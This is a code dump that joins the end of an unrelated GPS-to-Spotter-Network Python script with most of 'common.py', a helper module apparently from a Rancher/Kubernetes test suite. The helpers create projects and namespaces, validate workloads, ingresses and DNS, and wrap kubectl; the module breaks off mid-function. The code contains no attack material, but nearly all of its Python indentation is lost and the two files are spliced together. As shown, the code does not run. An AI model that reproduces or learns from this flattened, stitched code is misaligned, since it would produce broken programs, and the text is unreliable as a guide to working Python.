        logging.error('HTTP Status: ' + str(oRequest.status_code) + '; Update not successfully sent to SN at ' + datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f'))
return False
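# Connect to the local gpsd socket, enable JSON watch mode, and feed every TPV
# report into UpdatePos() while holding the position lock.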
def ConnectToGPSD():
global PosLock
global run
oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
oSocket.connect((TCP_IP, TCP_PORT))
oSocket.send(START_MESSAGE.encode('utf-8'))
while run:
data = oSocket.recv(BUFFER_SIZE)
arObjects = data.splitlines()
for line in arObjects:
#print(line)
dctPacket = json.loads(line.decode('utf-8'))
if dctPacket["class"] == "TPV":
with PosLock:
UpdatePos(dctPacket)
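# Push an update to Spotter Network at most once every 120 seconds.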
def UpdateSpotterNetwork():
global seconds_since_update
global PosLock
while run:
if time.perf_counter() - seconds_since_update > 120:
with PosLock:
if POSTUpdate():
seconds_since_update = time.perf_counter()
LoadUserFile()
if APPLICATION_ID:
tGPSD = threading.Thread(target=ConnectToGPSD)
tGPSD.start()
tSNUpdate = threading.Thread(target=UpdateSpotterNetwork)
tSNUpdate.start()
    tGPSD.join()
    tSNUpdate.join()
exit()
|
common.py
|
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_TIMEOUT = 120
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 240
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "")
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None")
USER_TOKEN = os.environ.get('USER_TOKEN', "None")
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
reason='Group RBAC tests are skipped.'
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
# -----------------------------------------------------------------------------
# this is used for testing rbac v2
test_rbac_v2 = os.environ.get("RANCHER_TEST_RBAC_V2", "False")
if_test_rbac_v2 = pytest.mark.skipif(test_rbac_v2 != "True",
reason='test for rbac v2 is skipped')
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def random_str():
return 'random-{0}-{1}'.format(random_num(), int(time.time()))
def random_num():
return random.randint(0, 1000000)
def random_int(start, end):
return random.randint(start, end)
def random_test_name(name="test"):
return name + "-" + str(random_int(10000, 99999))
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None):
start = time.time()
ret = callback()
while ret is None or ret is False:
time.sleep(.5)
if time.time() - start > timeout:
if timeout_message:
raise Exception(timeout_message)
else:
raise Exception('Timeout waiting for condition')
ret = callback()
return ret
def random_name():
return "test" + "-" + str(random_int(10000, 99999))
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
workload_list = deployment_list + daemonset_list + cronjob_list
wls = project_client.list_workload(namespaceId=ns.id).data
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
p = wait_for_pod_to_running(p_client, pod)
assert p["status"]["phase"] == "Running"
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
while p.state != "running":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if 'k3s' in cluster.version["gitVersion"] and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
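# Wait for the ingress to expose a publicEndpoints hostname, build the URL from
# it, and verify all backing pods respond through that endpoint.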
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code {0}'
', actual code {1}'.format(
expected_code, r.status_code
)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
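# Request the given URL repeatedly (with curl locally, or wget/Invoke-WebRequest
# from a client pod) until every pod name in target_name_list has answered at
# least once, proving traffic reaches all backing pods.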
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
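# End-to-end cluster validation: wait for the cluster and its nodes to reach
# the active state, optionally verify the Kubernetes version, confirm System
# project workloads are active, then deploy a daemonSet (plus an ingress when
# skipIngresscheck is False) as a smoke test.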
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN, timeout=MACHINE_TIMEOUT):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state,
timeout=timeout)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id], "targetPort": "80"}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-rancher")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected)
def validate_dns_entry(pod, host, expected):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
cmd = 'ping -c 1 -W 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
assert ping_validation_pass is True
assert " 0% packet loss" in str(ping_output)
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
Validates if dns_record is null in for current object client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
